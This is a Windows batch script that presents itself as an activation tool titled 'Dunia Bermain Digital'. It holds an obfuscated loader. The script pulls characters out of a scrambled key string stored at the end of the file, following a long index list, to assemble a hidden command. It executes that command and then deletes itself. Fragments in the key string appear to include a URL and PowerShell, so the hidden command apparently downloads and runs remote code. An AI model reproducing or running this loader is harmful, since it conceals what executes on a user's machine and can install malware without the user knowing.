@Echo Off
cls
color 07
title  Dunia Bermain Digital %iasver%
set _args=
set _elev=
set _unattended=0
set _args=%*
if defined _args set _args=%_args:"=%
if defined _args (
for %%A in (%_args%) do (
if /i "%%A"=="-el"  set _elev=1
if /i "%%A"=="/res" set _reset=1
if /i "%%A"=="/act" set _activate=1
)
)
for %%A in (%_activate% %_reset%) do (if "%%A"=="1" set _unattended=1)
For /F "Tokens=1,* Delims=ù" %%A in ('Type "%~0" ^| Findstr  "^{eKey}"') Do Set "__Key=%%B"
Set "Okeh="
SetLocal EnableDelayedExpansion
For %%` in (125=158,287=169,241=101;20=25=167,27,223,252,93,293;205=103;248;136,123;75;58;130;224;64,14,148=264,274=108,307=120,292;253=153;51;106,68,178,141,208=96,107;272,295;10=256=150,76,276;112=132=268=297,199=89;73=157;115=7=109,78,172;161;127=286;255,85;131;262=289,146;6,260=290=244;237;113,206;257=72=176=265=188;159,232;26;195,306=145,187,234;229,143=278=301,298,19,104=4;215,91,42=102,197=70=114=271;212;202=47,225,231=66,280=1=196=299,80=211;254=31=133;45,179=62,165;34;87=213=57=52,168=79=249=285=269;121=82,236=140=155=128,192,56;242=144;163;98=17=203=217,135=233,129;84=302=180;37,207=15=259=284=97;88,200;90,110;156=162=294;142,170,291=105,228=124,173=126;44,175=9=304;111,55,183;43;36,247,300=3=118=40=267,185,149,0;261,216;227;48=194,279=308,99;275=69;59=235=22=288=151;184,218;32,209=186=63,61,100=221=139=258;12,198,296;182;164;147,245=54,154;38;243,190=92,28;210,41;239,191;71=230;77=83=65;282;5;263;204,116,220,13,53;303;138,283;134=18;238=305;122;29;214,81;181,11,2;49,226;166;177,30;16=137;273=251,23=219=39,33,160;86,117,222=174,246=95,266;250=193=46,270,21;119=94;67,281=171,277=) Do Set "Okeh=!Okeh!!__Key:~%%`,1!"
!Okeh!
Pause
goto %nul1% & del "%~f0"
Goto :Eof

{eKey}ùcbn9T8Ny.kaiw2[b./b:hs7'*eolb9lsb e²/h3|911d4 rkcsÞci7dots"9ÚaUd{0WoP4 8rrß rarPqcn2glnBruos9Ci-te/24s2m:oeM.Pnl:eIt9v3sei3d/pLoh.& :t0snpar itysc[4N7eeui1'tioPIte:asalce.}oBkcilo-t/duabboyi7atpctR;/cccog3mcun72uva0l3ib 7/o  et9mTc-rtlbgS13Jrp7.5e5aax1-veoguaue5=aetE9Ssenastc]"p6en7dsrcw7 tcronn3e]e7ei0C4oS8
